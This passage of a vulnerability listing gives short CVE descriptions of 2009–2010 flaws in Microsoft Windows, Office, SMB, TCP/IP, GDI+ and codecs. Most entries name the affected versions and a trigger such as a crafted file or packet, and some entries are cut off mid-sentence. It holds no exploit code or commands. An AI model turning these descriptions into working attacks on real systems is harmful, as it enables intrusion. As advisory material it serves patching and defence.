2007 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0266] Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0264] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability." [CVE-2010-0263] Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0262] Microsoft Office Excel 2007 SP1 and SP2 and Office 2004 for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers access of an uninitialized stack variable, aka "Microsoft Office Excel FNGROUPNAME Record Uninitialized Memory Vulnerability." [CVE-2010-0261] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted spreadsheet in which "a MDXSET record is broken up into several records," aka "Microsoft Office Excel MDXSET Record Heap Overflow Vulnerability." [CVE-2010-0260] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0258] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2010-0257] Microsoft Office Excel 2002 SP3 does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel Record Memory Corruption Vulnerability." [CVE-2010-0256] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly calculate unspecified indexes associated with Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Index Calculation Memory Corruption Vulnerability." [CVE-2010-0254] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Attribute Validation Memory Corruption Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0243] Buffer overflow in MSO.DLL in Microsoft Office XP SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Office document, aka "MSO.DLL Buffer Overflow." [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0034] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Office PowerPoint Viewer TextCharsAtom Record Stack Overflow Vulnerability." [CVE-2010-0033] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Viewer TextBytesAtom Record Stack Overflow Vulnerability." [CVE-2010-0032] Use-after-free vulnerability in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "OEPlaceholderAtom Use After Free Vulnerability." [CVE-2010-0031] Array index error in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint OEPlaceholderAtom 'placementId' Invalid Array Indexing Vulnerability." [CVE-2010-0030] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint LinkedSlideAtom Heap Overflow Vulnerability." [CVE-2010-0029] Buffer overflow in Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint File Path Handling Buffer Overflow Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3830] The download functionality in Team Services in Microsoft Office SharePoint Server 2007 12.0.0.4518 and 12.0.0.6219 allows remote attackers to read ASP.NET source code via pathnames in the SourceUrl and Source parameters to _layouts/download.aspx. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET. [CVE-2009-3135] Stack-based buffer overflow in Microsoft Office Word 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, Office Word Viewer 2003 SP3, and Office Word Viewer allow remote attackers to execute arbitrary code via a Word document with a malformed File Information Block (FIB) structure, aka "Microsoft Office Word File Information Memory Corruption Vulnerability." [CVE-2009-3134] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3133] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a spreadsheet containing a malformed object that triggers memory corruption, related to "loading Excel records," aka "Excel Document Parsing Memory Corruption Vulnerability." [CVE-2009-3132] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3131] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3130] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via a spreadsheet containing a malformed Binary File Format (aka BIFF) record that triggers memory corruption, aka "Excel Document Parsing Heap Overflow Vulnerability." [CVE-2009-3129] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3128] Microsoft Office Excel 2002 SP3 and 2003 SP3, and Office Excel Viewer 2003 SP3, does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a spreadsheet with a malformed record object, aka "Excel SxView Memory Corruption Vulnerability." [CVE-2009-3127] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, and Office Excel Viewer 2003 SP3 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Cache Memory Corruption Vulnerability." [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2506] Integer overflow in the text converters in Microsoft Office Word 2002 SP3 and 2003 SP3 [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression 